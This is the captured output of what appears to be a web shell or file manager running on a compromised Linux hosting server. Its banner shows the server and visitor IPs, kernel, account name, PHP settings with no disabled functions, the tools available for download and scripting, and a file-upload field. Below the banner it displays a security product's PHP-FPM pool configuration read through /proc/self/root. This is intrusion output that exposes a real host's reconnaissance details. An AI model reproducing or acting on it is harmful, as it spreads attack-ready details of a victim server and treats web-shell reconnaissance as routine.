Server IP : 144.76.124.212 / Your IP : 216.73.216.94 Web Server : LiteSpeed System : Linux l4cp.vnetindia.com 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64 User : rakcha ( 1356) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/opt/cpguard/cpg-php-fpm/etc/ |
Upload File : |
;;;;;;;;;;;;;;;;;;;;; ; OPSSHIELD FPM Configuration ; ;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;; ; Global Options ; ;;;;;;;;;;;;;;;;;; [global] pid = /opt/cpguard/cpg-php-fpm/var/run/php-fpm.pid error_log = /opt/cpguard/cpg-php-fpm/var/log/php-fpm.log log_level = warning emergency_restart_threshold = 30 emergency_restart_interval = 60s process_control_timeout = 10s daemonize = yes ;;;;;;;;;;;;;;;;;;;; ; Pool Definitions ; ;;;;;;;;;;;;;;;;;;;; [cpguard] ;listen = /dev/shm/php-cgi.sock listen = /opt/cpguard/cpg-php-fpm/var/run/cpgphp-cgi.sock ;listen = 127.0.0.1:8777 listen.backlog = -1 listen.allowed_clients = 127.0.0.1 listen.owner = cpguard listen.group = cpguard listen.mode = 0666 user = cpguard group = cpguard pm = dynamic pm.max_children = 5 pm.start_servers = 2 pm.min_spare_servers = 2 pm.max_spare_servers = 3 pm.max_requests = 2048 pm.process_idle_timeout = 10s request_terminate_timeout = 120 request_slowlog_timeout = 0 slowlog = log/slow.log rlimit_files = 51200 rlimit_core = 0 catch_workers_output = yes env[PATH] = /usr/local/bin:/usr/bin:/bin env[TMP] = /tmp env[TMPDIR] = /tmp env[TEMP] = /tmp